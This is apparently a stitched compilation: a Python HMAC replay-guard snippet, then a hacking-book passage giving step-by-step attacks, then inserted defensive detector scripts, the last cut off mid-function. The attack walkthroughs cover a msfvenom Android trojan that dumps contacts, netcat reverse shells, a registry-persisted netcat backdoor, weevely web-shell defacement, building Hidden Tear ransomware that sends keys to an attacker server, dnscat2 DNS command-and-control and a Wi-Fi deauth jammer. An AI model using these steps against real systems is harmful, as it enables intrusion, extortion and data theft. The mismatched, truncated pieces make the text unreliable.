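WINDOW_SECONDS = 120   # how far a request's timestamp may drift from server time


def sign_request(key: bytes, method: str, path: str, body: bytes,
                 ts: int, nonce: str) -> str:
    """HMAC-SHA256 over every field that matters; changing any of them,
    including the body, invalidates the signature."""
    msg = b"\n".join([method.encode(), path.encode(), str(ts).encode(),
                      nonce.encode(), hashlib.sha256(body).digest()])
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def build_request(key: bytes, method: str, path: str, body: bytes,
                  now: Optional[int] = None) -> Dict[str, Any]:
    """Client side: attach a timestamp, a fresh random nonce and the signature."""
    ts = int(time.time()) if now is None else now
    nonce = secrets.token_hex(16)
    sig = sign_request(key, method, path, body, ts, nonce)
    return {"method": method, "path": path, "body": body,
            "headers": {"X-Timestamp": str(ts), "X-Nonce": nonce, "X-Signature": sig}}


class ReplayGuard:
    """Server side: checks the signature, rejects stale timestamps and refuses
    any nonce it has already accepted within the window."""

    def __init__(self, key: bytes, window: int = WINDOW_SECONDS) -> None:
        self.key = key
        self.window = window
        self.seen: Dict[str, int] = {}      # nonce -> timestamp it carried

    def _expire(self, now: int) -> None:
        """Forget nonces older than the window; such requests are stale anyway."""
        cutoff = now - self.window
        self.seen = {n: t for n, t in self.seen.items() if t >= cutoff}

    def verify(self, req: Dict[str, Any], now: Optional[int] = None) -> Tuple[bool, str]:
        now = int(time.time()) if now is None else now
        headers = req["headers"]
        try:
            ts = int(headers["X-Timestamp"])
        except (KeyError, ValueError):
            return False, "missing or malformed timestamp"
        nonce = headers.get("X-Nonce", "")
        sig = headers.get("X-Signature", "")
        expected = sign_request(self.key, req["method"], req["path"], req["body"], ts, nonce)
        if not hmac.compare_digest(expected, sig):   # constant-time comparison
            return False, "bad signature"
        if abs(now - ts) > self.window:               # replay of an old capture
            return False, "stale timestamp"
        self._expire(now)
        if nonce in self.seen:                        # replay inside the window
            return False, "replayed nonce"
        self.seen[nonce] = ts
        return True, "ok"
```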

Hack an Android Phone and Download its Contacts


In this section, we will learn how to hack an Android smartphone from Kali.
For this purpose, we will install an Android virtual machine on our computer.
Go to www.osboxes.org, then VM images, VirtualBox images, and download the
latest Android virtual machine.
You need to have VirtualBox installed; you just have to import the virtual
machine you downloaded. From the Kali side, we will create a malicious apk
file, a malicious Android application, and send it to the end-user, who is
the victim in this case. Once the victim installs and opens this application,
it creates a connection between their smartphone and our Kali machine. For
this purpose, we will use a command called msfvenom, which combines the old
msfpayload and msfencode commands. We will create a payload of type
android/meterpreter/reverse_tcp, specifying the IP of our server, which is
192.168.211.142, and a local port, 9999 in this case.
We will export this to the root desktop and call it, for this example,
trojan.apk. Of course, in a real-world scenario it would be given any fancy
name that tempts the user to open and install the application. You will
notice that the creation of the apk file is in progress, as shown below.

When it is done, you need to move this file from your Kali machine to the
end-user. That can be done using various techniques, such as social
engineering; for this exercise, we will copy the file from this machine to
our phone directly, and you will see it under the Download folder as
trojan.apk.
On the other side, we now need to create a listener on our server that will
accept this incoming connection. Launch the Armitage application; if you do
not have it installed, use apt install armitage. It takes some time to load
the first time. In the left pane, type Android, go to the payload section,
and double-click on reverse_tcp. You will see that the IP is populated
automatically; now we only need to match the local port with the port we
used when we created the apk file, as shown below. Press Launch and Armitage
starts the handler locally, waiting for connections on this port. We then go
to our Android device, open the downloaded application, and install it as
usual.
Notice that when you open the mobile application, the meterpreter session is
established and Armitage shows you that an Android or Linux-based device has
been compromised. Now we have full access to the remote Android phone. It is
worth noting that we are doing this in a lab, although it works over the
internet as well, using a real IP and port forwarding. Right-click on the
compromised machine and you can interact using the meterpreter shell; type
help and you will see all the commands you can invoke. You can also explore
and browse the files that exist on this phone. We are able to see many
personal files, such as passwords and credit card details. If you go back to
the meterpreter session and type help as we did earlier, you can invoke a
number of commands; an interesting one is dump_contacts, which searches for
the contacts on the phone and dumps them locally to a file, as shown below.

So, when I did that, I found 787 contacts! Hurray.


So let us check out this file: update the locate database and try to locate
the file. Now we open it using leafpad and we get lots of accounts with
phone numbers, emails, etc.

Going back to Armitage, another interesting command is dump_sms. Since this
is a virtual machine, there are no SMS messages to find, but in a real-world
attack you would be able to get all the SMS messages, as well as webcam
snapshots, using the corresponding commands. You can also search for files.
The point I am trying to make is that you now have full access to this
mobile phone and can do whatever you want.
Maintain Access
Post-Exploitation Terminologies
Exploiting a computer as we did earlier is awesome. But the goal of most
penetration tests is to maintain access to the compromised system, and there
are a number of methodologies for maintaining access to the exploited
victim. The aim of each of them is to reduce the time and effort required to
keep attacking the same machine over and over after it has been exploited.
Maintaining access is an art that involves just as much thought as exploiting
the system, if not more. Below are some terms that give you a brief
introduction to how access is maintained to systems after exploiting them.
What is Malware?
Malware is a general term used for viruses, worms, trojans, keyloggers,
bots, etc. It is the generic term to use when you write a penetration
testing report for an executive audience. But when you write the report at
the technical level, it is better to use the following terms:
A backdoor is a program left running on the compromised system to make it
easy to get back in later without having to exploit the vulnerability over
and over again.
A Trojan horse, or simply Trojan, is a malicious program that is installed
on the host to perform a desired function. You install it thinking it will
perform function ABC, but it performs function XYZ; it conceals and hides
its intentions.
A virus is malicious code that infects a file. It needs to be invoked by a
human, so you have to double-click the file to trigger it, and the virus
then infects the file; on its own, a virus cannot move from one machine to
another. A worm has the same destructive force as a virus but does not need
human interaction to replicate from one target to another; worms replicate
on their own.
From our perspective as penetration testers, we can use viruses to
compromise a system, but it is preferable not to use worms because, as you
can see, their nature is not controllable.
A keylogger is a system or a piece of code that captures keystrokes from the
user and feeds them back to us. It is an essential tool that penetration
testers use routinely.
A botnet is a network of bots (short for robots), sometimes called zombies:
compromised systems controlled by a single computer called the botmaster.
These systems are infected by viruses, trojans, backdoors, etc., and are
usually used to perform attacks such as DoS and to run spam services.
The idea is that a single computer controls a bunch of computers, and this
single computer, the botmaster, can also control another master in the same
network if it is made up of thousands of machines.
Adware is a program designed to display advertisements on your computer or
even your phone: the pop-ups that appear here and there and cannot be
closed. They are controlled by adware software that earns its developer
money through pay-per-click or pay-per-view, and it irritates users in
almost all cases. Once such adware collects information and monitors your
activities without your consent, it is called spyware.

Backdoor Tools Explained


A backdoor is a type of malware that bypasses the normal authentication
procedures to access a system. As a result, remote access is granted to
various resources within an operating system, an application, a database, a
file server, etc., giving perpetrators the ability to remotely issue
commands and even update the malware itself.
Backdoor installation is usually achieved by taking advantage of vulnerable
components on the remote system, and detecting these backdoors is difficult
most of the time. Web server backdoors are used for several malicious
activities: data theft, server hijacking, website defacement, launching
distributed denial of service attacks, infecting the website's visitors, and
advanced persistent threat campaigns.
The most prevalent backdoor installation method is RFI, remote file
inclusion, in which an attacker exploits a vulnerability in an application
that dynamically references external scripts; in an RFI scenario, the
referencing function is tricked into downloading a trojan from a remote
host. Some websites also offer a file upload function, for example to upload
your CV, without blocking PHP or other dangerous file types, and that
feature can be used to upload a backdoor to such websites.
Typically, perpetrators identify these targets using scanners that locate
websites with unpatched or outdated components that allow such remote file
inclusions. There are several backdoor tools, such as:
PowerSploit, a tool mainly used against Windows machines; it can be
installed on the victim's machine, where it helps the attacker connect to it
through PowerShell.
sbd and cryptcat, tools similar to the famous Netcat; they are portable and
can be easily installed on the victim's machine, whether Linux or
Windows-based. They allow connecting to the victim's machine remotely at any
time over a specific port in order to send remote commands. The main
difference between sbd and cryptcat is that cryptcat allows you to have
encrypted TCP and UDP connections.

Web shells can be used to maintain access to, or even hack, a website; most
of them are detected by antivirus, and the famous ones are the c99 and c100
shells.
Weevely is a PHP web shell that enables remote connection; it is a very
powerful tool that can be used as a stealthy backdoor, and it can also be
used to legitimately manage websites.
HTTPTunnel creates a bi-directional data stream tunneled inside HTTP
requests, and the requests can be sent through an HTTP proxy if desired.
dns2tcp (DNS to TCP) is a tunneling tool that passes TCP traffic inside DNS
traffic, meaning over port 53. This is another important tool because port
53 is legitimately used by DNS, and as such it is open most of the time.
If you know which antivirus application runs on the potential target system,
you might want to test your backdoor or trojan horse on www.virustotal.com.
This website reports how the common antivirus vendors detect a file that you
upload. This will help you execute a successful attack.

Netcat Simplified
In simple terms, Netcat is a computer utility for reading from and writing to
network connections using TCP or UDP. It can be used to:
Scan and connect to an arbitrary port
Create a listener on a local port
Transfer files
Remote administration (bind shell and reverse shell)
It can be invoked in the following way:
nc [flag options] [target IP address] [port]
The options we will use are:
-l = listen mode
-e = program to execute after the connection is established
-n = do not perform DNS lookups
-v = verbose
-p = local port
Reading from and writing to a network means the utility runs in two modes:
client mode and server mode. Netcat is a small tool, but a very powerful
one, especially in forensics, as you can redirect file output from the local
machine to the forensics workstation you are working on.
We use Netcat to scan and connect to an arbitrary port, to create a listener
on a local port, to transfer files, and for remote administration. We will
see examples of how to bind a shell and how to set up a reverse shell.
Netcat usually comes pre-installed on Kali Linux, but it is not installed by
default on Windows machines, so you can go to either of these links,
download the compiled Windows version and start using it:
https://eternallybored.org/misc/netcat/
https://sourceforge.net/projects/nc110/
The Kali machine we are using is not reachable from the Internet: it has a
private IP address and sits behind a router or firewall that holds the
public IP address. In this case, we will connect remotely to a Windows
machine hosted in the cloud with a public IP address. The Windows machine
could equally be the Windows machine we downloaded earlier on VMware, but
for the sake of giving a realistic example, we will use this scenario.

In the first scenario, we will connect to a port on a remote machine.
Actually, we will scan the port, see whether it is open, and connect to it.
Open the terminal on our Kali machine and write the command nc, the -n and
-v arguments, the IP address of the cloud Windows machine, which is
173.248.132.230, and the port. I know that port 8010 is open on this
machine: nc -nv 173.248.132.230 8010. The output of nc tells us that it
connected to this IP address on port 8010 and that the port is open. This
tells us a lot: first of all, that we managed to have a conversation with
this cloud server, and that port 8010 is open.
In the next example, we will bind a port and listen for incoming
connections. We go to the Windows server, where we find the Netcat files we
downloaded earlier. These files are compiled for Windows; just put them in a
folder, navigate to it, and issue the command nc -nlvp 2222, selecting port
2222.
So, what are we doing here?
We are issuing the Netcat command and passing the arguments n, do not
perform DNS lookups, and l for listen. Netcat is listening on port 2222 in
verbose mode, which means "show me any information about the connection".
Hit enter, and it will listen for any connection coming to port 2222.

Now we go to our Kali machine and connect remotely to the cloud machine to
open a conversation with the server: issue nc -nv 173.248.132.230 2222,
specifying the port, and press enter. It tells us that this port is now
open. So now there is a tunnel between these two computers: the Kali, which
is on the private network, and the Windows server, which is on the internet.
So, what can we do now?
Actually, we can open a chat session, for example. Let us type "Hello from
Kali" and press enter. Now if you go to the Windows machine, you will see
this message pop up there, and from the Windows machine I can reply "Hello
from Windows machine". If I go to the Kali, I will see that message pop up
there as well.
This is a simple demonstration, and chatting between two servers is not that
useful, but it demonstrates the many capabilities of the Netcat utility.
The third example is to set up a listener and redirect any incoming input to
a file, that is, transferring files from one computer to another. For this
purpose, we go to our Windows machine, press Control-C to exit the current
session, and from the terminal issue nc -nlvp 2222 > output.exe, which says
that anything arriving on this port should be redirected to the file
output.exe.
So now it is listening, and whatever comes on this port is redirected to
output.exe. On our Kali machine, we will transfer a file, so let us locate
one; for this purpose we locate sbd.exe, copy it, and issue
nc -nv 173.248.132.230 2222 < sbd.exe, connecting on port 2222 and feeding
the file in.
By issuing this command, we have transferred the sbd.exe file from the Kali
machine to the Windows machine. If you go there, you will see a new status
line: a connection from the public IP address of my router. If we quit this
session and run dir to list the directory, we will see the file we
transferred from our Kali machine to our Windows machine, with its size and
creation date and time.
The fourth example is about remote administration. As we saw earlier, we
have two machines: the Kali, on our LAN, and the Windows machine, in the
cloud. Suppose that the user of the cloud machine wants remote assistance
from the user of the Kali machine, so the Kali user will log on remotely to
the Windows machine. The user on the Windows machine issues
nc -nlvp 2222 -e cmd.exe. This command says: "any user who connects
remotely on port 2222 will be handed the command prompt, cmd.exe".
From the Kali side, we issue nc -nv, the IP address, and the port. When you
press enter, you are dropped into the Windows command line. Now you can
remotely manage Windows through the command line: list files, and the sky
is the limit, since we have full access and full control over the command
line.
In the last example, suppose the Kali user wants remote assistance from the
Windows user, but the Kali user is behind a firewall and the IP is NATed, so
the Kali side cannot expose a service as the Windows side did previously. In
this case, we go to the Windows machine and issue nc -nlvp with the port.
Then from our Kali machine we run nc -nv, the IP address, the port we want
to connect to, and the -e argument, which runs a program; and which program
do we run? Surprisingly, it is bash: nc -nv 173.248.132.230 followed by the
port and -e /bin/bash. The connection is now open. If you go to the Windows
machine and run a UNIX command like ifconfig, you have full remote access to
the bash terminal on Kali and will see that its IP address is
182.168.200.130, along with all the other information. You can issue any
other command as well. So, as you guessed, you can use Netcat as a backdoor
to access systems. One drawback of Netcat is that the traffic is not
encrypted; for that there is an enhanced version of Netcat called Ncat.
It is important to know that, because running Netcat creates open ports on
your machine, using Netcat can present a significant security risk if used
improperly, so make sure not to leave Netcat running while you are not using
it.

Install a Backdoor
Exploiting a computer is great work. However, our goal as penetration
testers is to maintain access to the compromised computer and to avoid
spending again the time and effort we already put into attacking the same
machine over and over.
So, for this purpose, we need to install a backdoor upon our first access or
compromise. To do this, we will use Netcat; as we learned in the previous
section, Netcat can act as a simple backdoor. Suppose that you have a
meterpreter session on a compromised computer, in this case a Windows 10
machine. The first thing we need to do is upload the Netcat program.
For this purpose, we issue the upload command from our meterpreter session,
referring to the Netcat program on our desktop and pointing to the location
where we want it on the Windows machine, under SysWOW64.
As you know, on a 64-bit Windows 10 machine you have System32 and SysWOW64
directories, and Windows automatically handles the placement of your 32-bit
and 64-bit files. In this case, nc.exe is a 32-bit file, so even if you put
it in System32, it will automatically appear in SysWOW64. To make it easier,
write the path as c:\\windows\\syswow64\\, press enter, and you will see that
the file has been uploaded to this directory.

Go to the Windows machine and search for this file; you will find it
together with the upload time. Back on our Kali machine, we have the file
placed on the victim's machine, but we still need a mechanism that loads
this file each time the Windows machine boots, so that each time the user
restarts or boots the machine, this Netcat file starts listening
automatically.
For this purpose, we create a registry value called Netcat that starts the
listener every time. This gives us permanent access to the victim's machine.
In the meterpreter session, use reg enumkey -k with the autorun (Run) key to
see the list of programs that currently run automatically on this target
machine. Run the command as seen in the image below; there are no children
and no identified key.
So now we need to create the value that runs this process upon boot. Use
reg setval -k with the same key, the -v argument for the new value name,
Netcat, and -d for the data, which should be the path
C:\windows\SysWOW64\nc.exe with the arguments that make it listen on port
6666 and execute cmd.exe. Hit enter and you get a message that the key was
set successfully.

Now if we go to the Windows machine, we can locate this registry entry.
Search for it from the Start menu; just find and search for the Netcat value.
You will see that the registry entry Netcat has been created, and that this is
the value we have just passed from meterpreter.
Back on our Kali machine, we will reboot the remote computer. Notice that
the meterpreter session has died. Go back to the Windows machine after the
reboot and log in. Now go directly to Kali and open a new terminal. If we
issue the Netcat command pointing at this compromised victim, we should
get a remote shell straight away. So let us try that: -v for verbose, then the
host address 192.168.211.129 and the port 666. Hit enter and you will find
that you have full remote access, a Windows shell, and you can do anything,
so the sky is the limit now and your backdoor is installed successfully. You
can access the remote target at any time, even if the target machine has been
patched or upgraded.

Deface a Website in Few Seconds

We are going to learn how to deface a website by replacing its contents in
just a few seconds using a tool called weevely. First of all, we will generate a
malicious file that gives us remote access to the web server so that we can
manipulate its contents. This malicious file is our backdoor. Open your
terminal and write weevely, then weevely generate to generate the backdoor;
choose the password for your file, 123 in this case, and then the path where
the file will be created.
We created the file on our desktop. Try to open it: it is encrypted, which
actually gives us another layer of protection.

I have created a simple website for this tutorial. It is a generic website with a
couple of pages in addition to an "upload your CV" page. The purpose is to
upload our backdoor file to this web server. Many websites in the wild offer
this feature, where you can upload your CV or a couple of images; many of
them block files with the PHP extension, but some do not, so you have to
check the website you are testing for that. You can also leverage what we
learned before to remotely compromise the server over FTP and upload your
backdoor file that way. Navigate to the upload your CV page, click browse,
select the backdoor file we have created and upload it; you will see that the
file backdoor.php has been uploaded. It is uploaded under a specific path, so
copy this path, go back to your terminal and issue the weevely command.
We want to establish a remote session with our backdoor file, so we use the
weevely command again: write weevely, then enter the URL with upload.php
changed to backdoor.php, and then provide your password. To check that it
is connected, just list the directory and you will see the files on the server;
you can also print the working directory, and you will see that we are
working under /var/www/html.
You can also go to the root of the website, /var/www/html, and list it again to
see the index.php file, which is the homepage. Now go to the homepage and
refresh. We want to deface this website, so we will remove the index.php and
upload our own index.php. You can type help to see all the modules available
in weevely, such as upload files, download files, brute force SQL, and SQL
database dump. For this purpose, we will be using the file upload and file
remove commands.

Go back to the web browser and refresh the page; the index.php is now gone.
Back on our Kali machine, upload the simple index.php file we just created;
it is on the desktop again, so the origin is /root/Desktop/index.php. Having
specified the origin, we have to specify the destination, which will again be
under /var/www/html and named index.php.
It will return true. Now go back to the website and refresh it, and you will
notice that we have defaced the website with our own PHP index file. In a
nutshell, we installed the backdoor using the upload facility, connected to the
backdoor, removed the index file and replaced it with our own. Simple!

Understand the Hidden Tear Ransomware

This is a hands-on section on how to download the Hidden Tear ransomware,
edit it, and then execute it on a victim's machine. But before going further, let
me tell you some history about this ransomware. Hidden Tear was an
open-source project whose goal was to create a simple ransomware in C#.
Unfortunately, the project was abandoned on GitHub, but it currently has
more than 400 forks. You can go to GitHub, find any of these forks, and
download it. The ransomware uses the symmetric AES algorithm to encrypt
the victim's files; it then sends the symmetric key to a server that we will set
up and leaves the victim with a text file containing a message that explains
what happened. Encrypted files can be decrypted with a decrypter program
given the encryption key.
You first need to install Visual Studio with C# support. Download one of the
forks of the Hidden Tear ransomware from GitHub and open the project files
in Visual Studio to edit them. After that, we will configure a web server on
Kali to receive the encryption keys, then move the ransomware and the
decrypter to the victim's machine and execute the attack.
First of all, go to GitHub at https://github.com/goliate/hidden-tear and
download the project. Open the downloaded archive and you will be
presented with two main folders, or two main projects: hidden-tear, which is
the Visual Studio solution, and the decrypter, which will decrypt the files.
After extracting the archive, double-click the hidden-tear project to open it in
Visual Studio. Right-click Form1.cs and choose View Code.
Let us walk through this to make our own version of the Hidden Tear
ransomware. As you can see below, this is the target server that we will need
to set up.

We will put in the IP of our Kali server, then create a simple PHP file that
receives the encryption keys via the info argument. Scrolling down, you will
see the extension given to encrypted files (.locked by default); you can
change that to your own extension. Below that, you will see all the
extensions of the files that will be encrypted; you can add or remove any of
the file types that you want to encrypt on the victim's machine.

Scrolling towards the end of the source code, you will see the string path,
which is the path targeted by the attack. In this example, the ransomware will
only encrypt the files under the test folder on the desktop.
Further down, you will see the text file that will be created on the victim's
machine and the message that will be put in it, for example: "You have been
hacked; send us an amount of 0.5 bitcoins to this address to view your files
again".

The most important part is the target URL: this is where the key is sent from
the victim to the web server you have set up, which will then hold the
encryption key. We will create a web server on the Kali machine, and then a
PHP file in the root directory of the web server to receive the key.
For this purpose, we will call the file keys.php and place it in the Kali
server's web root, and we will receive the key through the info argument. You
need to populate the IP of the web server; in this case, it is 192.168.211.143.
Setting up the web server is quite easy: go to your Kali machine and navigate
to /var/www/html, then list the contents; you have the index.php.
Now you need to create the keys.php file: use gedit keys.php, and once this
file opens, just paste the following code. This is the PHP script in the
keys.php file that reads the data from the info GET argument and writes it to
the data.txt file.
For the same purpose, we need to create the data.txt file in the same web root.
Use the same command, gedit data.txt, open the file and make sure to save it.

After you create the data.txt file, it is important to grant write access to it. In
/var/www/html, right-click data.txt, select Properties, then Permissions;
under Group choose www-data and give it read and write access.
Now let us list the directory. We have data.txt to store the encryption keys
and keys.php, which holds the PHP script that receives the information via
the info GET argument. The only thing left to do is to start the Apache
service. Now everything is in place for the attack.

After we have edited the source with the target path, the extension given to
encrypted files, the file types to encrypt, and the folder to attack, along with
the message to the victim, it is time to compile the C# project. Navigate to
the hidden-tear folder that you have downloaded, then to bin and the debug
folder, where you will see the hidden-tear.exe file, as shown below.

Now open the decrypter C# project and make sure to update its path as we
did for the ransomware. Navigate to the Build menu and compile the solution.
In the decrypter folder under bin, you will find the decrypter.exe file. Now we
move the ransomware and the decrypter to the victim's machine. Double-click
the ransomware and notice what happens: the files change to the .redpython
extension and are encrypted, and a new file containing our message is
created. Now go to the Kali machine.
Remember that in the same web root we had the file data.txt, so let us check
what is in it. As you can see below, it contains the name of the victim's
machine, the victim's username, and the key used to encrypt the files. To
decrypt the files, run the hidden-tear decrypter, paste the password, and click
decrypt files.

To protect yourself against possible ransomware attacks, make sure to follow
the advice below.

Don't pay the ransom
Restore from a good backup
Keep your personal information PRIVATE
Use an antivirus that uses machine learning techniques
Use a firewall
Use content filtering for emails
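As an added defensive example (not from the book or the Hidden Tear project), the following Python script shows one cheap early-warning check for the behaviour this section describes: canary files that are hashed when planted, then re-checked for renaming or modification, alongside a scan for the renamed-extension and ransom-note side effects. The canary names, note markers and the tamper simulation are assumptions made for the example; the simulation only renames a file and writes a note, it encrypts nothing.

```python
"""Canary-file check for the behaviour described above: files renamed to a new
extension (.locked or .redpython) and a ransom note dropped in the folder.
Constructed for this section; names, markers and the tamper simulation are assumptions."""
import hashlib
import tempfile
from pathlib import Path

# Names chosen to sort first and last so a directory walk reaches them early and late.
CANARY_NAMES = ("_000_canary.docx", "zzz_canary.txt")
NOTE_MARKERS = ("bitcoin", "decrypt", "your files")   # phrases typical of a ransom note
SUSPECT_EXTS = (".locked", ".redpython")              # extensions this section mentions


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def plant_canaries(root):
    """Write the canary files and return a manifest {name: sha256} for later checks."""
    manifest = {}
    for name in CANARY_NAMES:
        p = Path(root) / name
        p.write_bytes(b"canary file " + name.encode() + b"\n")
        manifest[name] = sha256_file(p)
    return manifest


def check_folder(root, manifest):
    """Return a list of (kind, detail) findings; an empty list means nothing suspicious."""
    root = Path(root)
    findings = []
    for name, digest in manifest.items():
        p = root / name
        if not p.exists():
            findings.append(("canary_missing", name))        # renamed or deleted
        elif sha256_file(p) != digest:
            findings.append(("canary_modified", name))       # overwritten in place
    for p in sorted(root.iterdir()):
        if not p.is_file():
            continue
        if p.suffix.lower() in SUSPECT_EXTS:
            findings.append(("suspect_extension", p.name))
        elif p.suffix.lower() == ".txt" and p.stat().st_size < 4096:
            text = p.read_text(errors="replace").lower()
            if sum(marker in text for marker in NOTE_MARKERS) >= 2:
                findings.append(("ransom_note", p.name))
    return findings


def simulate_tampering(root):
    """Test fixture only: reproduce the visible side effects (rename plus note), no encryption."""
    root = Path(root)
    first = root / CANARY_NAMES[0]
    first.rename(root / (first.name + ".locked"))
    (root / "READ_ME.txt").write_text("Your files are encrypted. Send bitcoin to decrypt them.\n")


def demo():
    """Plant canaries in a temporary folder, check it, tamper, and check again."""
    with tempfile.TemporaryDirectory() as d:
        manifest = plant_canaries(d)
        before = check_folder(d, manifest)
        simulate_tampering(d)
        after = check_folder(d, manifest)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("clean folder:", before)
    print("after tampering:", after)
```

In practice check_folder would run on a schedule against the folders you care about, with a real manifest stored outside those folders.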

Bypass Firewalls by Tunneling Data and Commands over DNS

Port 53, the DNS port, might be the only port that companies do not block.
Attackers can abuse this weakness in firewalls to set up a command and
control channel that can be very difficult to detect or even block. We need to
set up a server with the dnscat2 software installed that listens for the DNS
queries coming from the client. Once this is established, we can transmit
data and even invoke commands over this channel, as depicted below.

All traffic through the corporate firewall is blocked except DNS traffic on
port 53, which is used to resolve domain names. Attackers leverage this open
port to set up an external command and control center and perform various
types of malicious acts.
First of all, we need to install the dnscat2 server on our Kali machine and
then run it. For this purpose, just copy the commands shown below: they
update Kali's package lists, install the Ruby development headers and build
tools, install bundler, clone dnscat2 from GitHub onto our Kali machine,
change into the dnscat2 server directory, and run bundle install.
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Now run the dnscat2 server with Ruby:
ruby ./dnscat2.rb
The dnscat2 server starts listening on port 53, and our server is set up and
ready.

For the client part, navigate to skullsecurity.org/dnscat2 and download the
Windows version. Open the command prompt, navigate to the desktop, and
invoke the following command, where the IP is the IP of our Kali machine.
An encrypted session will be established over port 53, using the TXT,
CNAME, and MX record types. If you go back to your Kali machine, you
will see that a new window reports session number one: a connection has
been established and the server has been notified.

To interact with the first session, type session -i 1, and you will see the name
of the client, the victim. Now we have a remote shell to interact with.

Type help to see all the commands that you can run remotely.
Now let us try to run notepad remotely. Just type exec notepad.exe and press
enter; it will tell you that the request has been sent.

Go to the victim's machine and you will see that notepad has opened. Each
time a new session is created you are notified on the server and can interact
with it using session -i and the session number.
Tunnels have been established between the client and server over port 53. To
confirm that it really is over port 53, we will run Wireshark to sniff the traffic
and inspect what is being sent and received. Select the proper interface and
press capture. With Wireshark active on the server side, trigger the same
notepad command.
As you will notice, the protocol captured is mainly DNS, so anyone
monitoring the victim's network traffic will only see DNS queries. This
traffic will of course blend with the noise present on many networks. For
example, establishing the initial command and control connection requires
the dnscat2 client to resolve a TXT record, which is a very normal thing to
do, so it will not trigger an alert. To protect against this type of attack, block
outbound DNS traffic and only allow interaction with trusted DNS servers.
Secret Sauce BONUS
Wi-Fi Jamming Tool
Have you ever thought of blocking Wi-Fi signals or kicking someone off your
Wi-Fi network? Well, this is the right topic for you. We are going to create a
simple Wi-Fi jammer so tiny that it fits in your pocket, so you can carry it
anywhere and power it from a simple power bank or even your mobile
phone.
First of all, browse to AliExpress and search for NodeMCU, then click on the
first result, which is a NodeMCU wireless module.

MCU stands for microcontroller unit: a small computer on a single IC, or
integrated circuit. This device is used to prototype IoT products and
applications. It can act as a client, as a server, or as a wireless device at the
same time.
As per the description on the NodeMCU website, it is an open-source,
interactive, programmable, low-cost, simple, smart Wi-Fi enabled device.
The de-authentication attack is the main application that we are going to
build on this chip. It will show you how vulnerable the 802.11 Wi-Fi
standard is. A de-authentication attack disconnects devices from the Wi-Fi
network, which is a huge vulnerability in the official 802.11 Wi-Fi standard.
In 2009, the Wi-Fi Alliance fixed this problem in the 802.11w standard,
which increased security by providing confidentiality for management
frames and adding mechanisms for data integrity, data authenticity, and
replay attack protection. However, the majority of access points and clients
are still vulnerable to this attack. Connect the device to your laptop using a
USB cable, go to the site https://sparks.gogo.co.nz/ch340.html and install
the USB connectivity driver.

This is very important, as you need to see the device in Device Manager on
your Windows machine; it tells you which port it is connected to, as shown
below.

Navigate to the website deauth.me and set up the NodeMCU using the online
interactive step-by-step tutorial. It will first ask whether you are a novice or
an expert; choose novice. It will ask you to download the bin file; click to
download it from GitHub, where you can see the releases of the bin file, and
download the latest one.
Go back to the site, press next, and select the operating system you are
using. You need to download the flasher software, which will upload the bin
file, that is, the firmware, to the NodeMCU device. Press next and select the
COM port the board is on. Press next again and you will be presented with
step-by-step instructions for uploading the firmware.
Open the flasher and you will notice that the device is connected to the
COM8 port. Go to Config and select the location of the bin file. Next, on the
Operations tab, select the COM8 port and press the Flash button. It will take
some time to upload the firmware; once you see the checkmark, the
firmware has been uploaded successfully.
Go to the Advanced tab and keep the defaults shown for the chip.

Now that things are in place, you need to connect to the Wi-Fi SSID named
pwned: open the Wi-Fi list, click pwned, and press connect. The first time,
you will be prompted for the password, which is deauther. Navigate to the IP
192.168.4 and you will be presented with the application we have just loaded
onto the NodeMCU.
The first tab scans all the neighboring Wi-Fi networks. Once you start it, you
will notice that the blue LED on the chip turns on; after a couple of seconds
it turns off. Once it turns off, press reload and you will get all the
neighboring Wi-Fi networks.

After that, select one access point and press the scan stations button. Again,
the blue LED on the chip will turn on; it takes 15 seconds to scan the stations
connected to this access point. During the station scan you will be
disconnected from the pwned network, so after the scan is complete, make
sure to connect to the pwned network again.
Press the reload button and go down to the stations section. Choose select
all, so that we select all the stations associated with this access point. Then
go to the attacks menu, where you will see three types of attacks: the
de-authentication attack, the beacon attack, and the probe attack.

As for the de-authentication attack, which is the main application, we will
select six targets. Once we press start, it will begin sending de-authentication
frames to all six targets, so none of them will be able to stay connected. This
chip runs on 2.5 gigahertz, so all the clients on 2.5 gigahertz will be
disconnected, while clients on 5 gigahertz, for example, will not be affected
by this attack.
Now we will observe the effect of this attack on a client connected to our
network. Use another laptop, connect it to the access point, and open Google
to confirm that there is an internet connection. Now initiate the
de-authentication attack from the NodeMCU and watch what happens. After
a couple of seconds you will see a yellow mark, which says that there is no
internet connectivity.
Refresh the list of Wi-Fi SSIDs and you will find that there is no internet
access. After a few seconds, the laptop will identify the network and
reconnect to it; refresh the list again and it is connected, but the
de-authentication packets will disconnect the client again shortly. This can go
on forever, depending on your configuration.
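As an added defensive example (not from the book or the deauther project), the following Python detector flags the de-authentication flood this section demonstrates: a burst of deauth or disassoc management frames from one BSSID within a short window. The frame tuples, BSSIDs and station addresses are constructed; in practice they would come from a monitor-mode sniffer, and with 802.11w protected management frames enabled the client would reject such unauthenticated frames in the first place.

```python
"""Detector for an 802.11 de-authentication flood. Input is a constructed list of
(time_s, subtype, bssid, addr1) tuples, not a real capture; it assumes a sniffer has
already reduced management frames to that shape."""
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10            # 802.11 management-frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "aa:bb:cc:00:00:01"             # constructed BSSID under attack
AP2 = "aa:bb:cc:00:00:02"            # constructed BSSID with only benign activity
STATIONS = ["11:11:11:00:00:01", "11:11:11:00:00:02", "11:11:11:00:00:03"]


def build_sample():
    """Constructed frames: two isolated, legitimate-looking frames from AP2, then a
    burst of 30 deauths from AP to three stations within 0.3 seconds."""
    frames = [(0.5, DEAUTH, AP2, STATIONS[0]), (3.0, DISASSOC, AP2, STATIONS[1])]
    frames += [(5.0 + i * 0.01, DEAUTH, AP, STATIONS[i % 3]) for i in range(30)]
    return frames


def deauth_flood_alerts(frames, window_s=1.0, threshold=10):
    """Return {bssid: alert} for each BSSID whose deauth/disassoc count within any
    sliding window of window_s seconds reaches threshold. One alert per BSSID."""
    recent = defaultdict(deque)      # bssid -> deque of (time, addr1) inside the window
    alerts = {}
    for t, subtype, bssid, addr1 in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
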